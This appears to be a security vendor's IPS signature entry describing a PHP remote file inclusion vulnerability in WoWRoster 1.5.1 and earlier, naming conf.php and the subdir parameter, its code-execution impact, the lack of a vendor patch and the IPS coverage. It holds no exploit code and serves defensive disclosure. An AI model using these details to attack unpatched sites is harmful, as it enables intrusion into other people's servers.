WoW.Roster.subdir.Parameter.Handling.File

description-logoDescription

PHP remote file inclusion vulnerability in conf.php in WoWRoster (aka World of Warcraft Roster) 1.5.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the subdir parameter.

affected-products-logoAffected Products

WoW Roster WoW Roster 1.5.1
WoW Roster WoW Roster 1.5

Impact logoImpact

Arbitrary PHP code execution

recomended-action-logoRecommended Actions

Currently we are not aware of any official vendor-supplied patches for these issues.
WoWRoster Web site: http://www.wowroster.net/.

Telemetry logoTelemetry

Coverage

IPS (Regular DB)
IPS (Extended DB)